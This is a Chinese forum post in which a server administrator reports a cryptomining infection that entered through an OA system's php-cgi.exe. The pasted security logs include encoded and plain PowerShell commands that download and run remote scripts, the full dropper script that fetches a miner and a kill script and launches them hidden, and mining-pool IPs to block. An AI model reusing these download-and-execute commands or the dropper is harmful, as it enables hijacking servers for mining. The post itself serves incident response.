通过OA的php-cgi.exe 中挖矿病毒 耗尽服务器资源
服务器中毒了。查杀了一次,又换了其它恶意源,杀毒软件杀不出来,服务器2012R2,OA是2017最新10.20检查日志发现:
通过调用 oa的 php-cgi.exe 去下载执行https://www.naosbio.com/images/main/js/ax.txt 脚本 安装 MSASC.exe 程序
然后通过此程序访问矿机中控耗尽服务器cpu和内存。
第一步: 安装MSASC并执行
进程异常行为-访问恶意下载源2020-06-06 05:54:11
父进程路径:D:/MYOA/bin/php-cgi.exe
父进程命令行:D:\MYOA\bin\php-cgi.exe
父进程id:3704
进程ID:14824
URL链接:https://www.naosbio.com/images/main/js/ax.txt
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
进程异常行为-异常调用系统工具 2020-06-06 05:54:12
命令行:powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
进程路径:C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe
进程ID:15048
父进程命令行:cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
父进程文件路径:C:/Windows/SysWOW64/cmd.exe
https://www.naosbio.com/images/main/js/ax.txt执行脚本,下载 程序MSASC
$ne = $MyInvocation.MyCommand.Path
$miner_url = "https://www.naosbio.com/images/main/js/a/MSASC.exe"
$miner_url_backup = "https://www.naosbio.com/images/main/js/a/MSASC.exe"
$miner_name = "MSASC"
$miner_cfg_url = "https://www.naosbio.com/images/main/js/a/config.json"
$miner_cfg_url_backup = "https://www.naosbio.com/images/main/js/a/config.json"
$miner_cfg_name = "config.json"
$killmodule_url = "https://www.naosbio.com/images/main/js/a/clean.bat"
$killmodule_url_backup = "https://www.naosbio.com/images/main/js/a/clean.bat"
$killmodule_name = "clean.bat"
$miner_path = "$env:TMP\MSASC.exe"
$miner_cfg_path = "$env:TMP\config.json"
$payload_path = "$env:TMP\update.ps1"
$killmodule_path = "$env:TMP\clean.bat"
function Update($url,$backup_url,$path,$proc_name)
{
Get-Process -Name $proc_name | Stop-Process
Remove-Item $path
Try {
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($url,$path)
}
Catch {
Write-Output "donwload with backurl"
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($backup_url,$path)
}
}
#miner_path
#clean.bat
if((Test-Path $killmodule_path))
{
Remove-Item $killmodule_path
Update $killmodule_url $killmodule_url_backup $killmodule_path $killmodule_name
}
else {
Update $killmodule_url $killmodule_url_backup $killmodule_path $killmodule_name
}
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
{
Update $miner_url $miner_url_backup $miner_path $miner_name
Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
Start-Process $miner_path -windowstyle hidden
}
else
{
Write-Output "Miner Running"
}
Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden
进程异常行为-可疑文件落盘执行2020-06-06 05:54:15
命令行:"C:\Windows\TEMP\MSASC.exe"
进程路径:C:/Windows/Temp/MSASC.exe
进程ID:3440
父进程命令行:powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
第二步: 运行MSASC 访问矿机中控
恶意进程(云查杀)-挖矿程序2020-06-06 05:54:19
文件路径:C:/Windows/Temp/MSASC.exe
恶意文件md5:b5fa5e04c916ca653a01e209754bc2fa
进程id:3,440
描述:通常黑客入侵后会植入挖矿程序赚取收益,
异常网络连接-矿池通信行为 2020-06-06 05:59:07
矿池IP:94.23.23.52
矿池端口:3333
进程路径:C:/Windows/Temp/MSASC.exe
进程ID:3440
命令行参数:"C:\Windows\TEMP\MSASC.exe"
恶意进程(云查杀)2020-06-06 06:49:03
中控IP:37.187.95.110
中控端口:3333
进程路径:c:/windows/temp/msasc.exe
命令行参数:"C:\Windows\TEMP\MSASC.exe"
事件说明:云盾检测到您的服务器的进程正在尝试访问一个可疑的恶意IP
矿机中控IP:可以加到防火墙拒绝以下IP连接
210.108.70.119,
94.23.247.226,
37.59.55.60,
37.59.43.131,
149.202.83.171,
91.121.140.167,
94.23.23.52,
37.187.95.110,
185.92.222.223,
94.130.165.85,
1.246.220.121
-------------------------
前期也中了挖矿病毒,也是 通过调用 oa的 php-cgi.exe文件,在OA的文件夹下生产了一些其它的文件,当时直接删除了,没有保存。
进程异常行为-访问恶意下载源
父进程路径:D:/MYOA/bin/php-cgi.exe
父进程命令行:D:\MYOA\bin\php-cgi.exe
父进程id:3244
进程ID:28184
URL链接:http://13.115.195.195:801/muma.ps1
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http://13.115.195.195:801/muma.ps1')
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源 建议安装个火绒,查杀一下。
页:
[1]